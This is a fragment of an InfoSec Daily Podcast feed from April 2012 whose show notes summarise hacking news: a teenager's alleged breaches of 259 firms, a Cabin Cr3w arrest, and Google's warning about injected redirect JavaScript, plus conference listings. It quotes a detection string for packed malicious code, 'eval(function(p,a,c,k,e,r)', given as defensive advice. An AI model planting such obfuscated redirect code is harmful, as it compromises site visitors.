<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Austrian police have arrested a 15-year-old student suspected of hacking into 259 companies across the span of three months. Authorities allege the suspect scanned the Internet for vulnerabilities and bugs in websites and databases that he could then exploit. As soon as he was questioned, the young boy confessed to the attacks, according to Austria&rsquo;s Federal Criminal Police Office (</span><a href="http://www.bmi.gv.at/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">BMI</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The boy allegedly stole data and published it publicly after breaching the security infrastructures of 259 firms. He also defaced many company websites and boasted about his accomplishments on Twitter, where he also posted links to his data dumps.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The firms were attacked between January 2012 and March 2012, and they were not limited to just Austria. He didn&rsquo;t seem to target specific types of industries: everything from sports companies, to tourism services, to adult entertainment, to search services were attacked.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The young man reportedly admitted to being responsible, saying that he was bored and wanted to prove himself. He was described as anti-social, and so looked to the online world for praise and affirmation, possibly being inspired by reports about the hacktivist group Anonymous.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After finding a hacker forum that gave members points for successful attacks, the boy went to work. Three months later, the 15-year-old was in the top 50 hackers of the approximately 2,000 users registered on the forum.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The teenager used various hacking tools widely available on the Internet, including software that helped him remain anonymous. Now and then, he left messages in the systems he hacked, or simply signed them with the hacker name ACK!3STX (a search for the handle on Twitter gave me no results).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Eventually, however, ACK!3STX&rsquo;s anonymizing software failed him and his IP address was visible to BMI&rsquo;s C4 (Cyber Crime Competence Centre) unit. C4 had been receiving multiple complaints from companies since the beginning of the year, so they started monitoring the hacker. At the end of last month, the unit traced his location to a residence in Lower Austria, and then obtained a search warrant.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.securitynewsdaily.com/1742-fbi-arrests-cabin-crew-hacker.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitynewsdaily.com/1742-fbi-arrests-cabin-crew-hacker.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Federal agents have arrested another member of the Cabin Cr3w hacking group, an offshoot of the Anonymous hacktivist network, for breaching two Utah police websites.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">John Anthony Borell III of Toledo, Ohio, has been charged with two counts of computer intrusion, according to an </span><a href="http://www.scribd.com/doc/89670544/Indictment-and-Complaint-against-Anonymous-hacker"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">indictment</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> unsealed yesterday (April 16) in a federal court in Utah. The indictment states that on two separate occasions in January, Borell hacked into the servers of the Utah chiefs of police and the Salt Lake City Police Department and leaked classified documents.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Borell, 21, pleaded not guilty to the charges, the</span><a href="http://www.washingtonpost.com/national/ohio-anonymous-member-21-charged-with-hacking-utah-police-websites/2012/04/16/gIQACKZkLT_story.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Associated Press reported</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. He faces 10 years in prison and a $250,000 fine if convicted.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/google-warns-20000-webmasters-about-weird-redirects-041812"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/google-warns-20000-webmasters-about-weird-redirects-041812</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The head of Google&#39;s Web spam team says that the company has pushed warning messages to some 20,000 Web site owners that their sites may be compromised and are performing &quot;weird&quot; redirections, possibly to malicious Web sites.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Matt Cutts</span><a href="https://twitter.com/#%21/mattcutts"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">used a Twitter message</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Tuesday to announce that the company sent &quot;your might be hacked&#39; messages to the sites, which are in &quot;dozens of different languages.&quot; The notices from the company&#39;s Search Quality Team, are visible on the Web sites in question and warn web masters that their site &quot;may be hacked&quot; and that JavaScript may have been injected into the site to &quot;redirect users to malicious sites.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;You should check your source code for any unfamiliar JavaScript and in particular any files containing &quot;eval(function(p,a,c,k,e,r). The malicious code may be placed in HTML, JavaScript or PHP files so it&#39;s important to be thorough in your search,&quot; Google warns.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A search turned up only a handful of non-english Web sites displaying the warning text, though Cutts said that 20,000 Webmasters received the notice.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s not the first time Google has taken action to weed out compromised Web sites from those that may turn up in search results. In July, 2011, the company</span><a href="http://threatpost.com/en_us/blogs/google-removes-cocc-subdomains-over-phishing-spam-concerns-070611"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">removed Web sites hosted on .co.cc free Web hosting service from its search results</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, saying that because such a large percentage of the sites on that free hosting provider are low-quality or spammy.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-648-overblown-mini-pwner-15yo-hacker-cabin-cr3w-and-weird-redir/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3786/0/infosec-daily-podcast-episode-648.mp3" length="59122712" type="audio/mpeg" />
		<itunes:duration>0:41:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 648 for April 18, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.oute[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 648 for April 18, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://arstechnica.com/tech-policy/news/2012/04/study-shows-cybercrime-estimates-to-be-overblown.ars
Since the first zero met the first one, people have been shrilly overestimating the effects of computers on our day-to-day lives. Most instances of wild exaggeration are eventually brought back down to earth (at least for a while). It happened with the wild estimates of economic harm done by piracy. The latest aspect of our shared interaction to be punctured is cybercrime, the extent and pervasiveness of which has been described in terms of near-Apocalyptic overstatement, according to the authors of a new report.
The report, &#34;Sex, Lies and Cyber-crime Surveys&#34; (PDF), by Dinei Florencio and Cormac Herley of Microsoft Research, has now been released.
In an op-ed in the New York Times that coincided with the report&#39;s release, they wrote, &#34;One recent estimate placed annual direct consumer losses at $114 billion worldwide. It turns out, however, that such widely circulated cybercrime estimates are generated using absurdly bad statistical methods, making them wholly unreliable.&#34;
What initially attracted the authors&#39; attention was the disparity between the huge figures and the fact that access to these resources (money, via hacking) is relatively easy.
&#34;The demand for easy money outstrips supply. Is cybercrime an exception?&#34; Florencio and &#160;Herley asked. &#34;If getting rich were as simple as downloading and running software, wouldn&#39;t more people do it, and thus drive down returns?&#34;
The problem, they discovered, was in the manner of gathering the cybercrime loss figures. They were put together via surveys.
&#34;First, losses are extremely concentrated,&#34; they wrote in the report, &#34;so that representative sampling of the population does not give representative sampling of the losses. Second, losses are based on unverified self-reported numbers. Not only is it possible for a single outlier to distort the result, we find evi[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 647 &#8211; Quantum Encryption,TriCk, 100 days, Mimikatz, and MySQL DoS</title>
		<link>http://www.isdpodcast.com/episode-647-quantum-encryptiontrick-100-days-mimikatz-and-mysql-dos</link>
		<comments>http://www.isdpodcast.com/episode-647-quantum-encryptiontrick-100-days-mimikatz-and-mysql-dos#comments</comments>
		<pubDate>Wed, 18 Apr 2012 00:50:07 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3781</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 647 for April 17, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Themson Mester. Special Guest Co-Host SkyDog. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 647 for April 17, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Themson Mester.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Guest Co-Host SkyDog.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
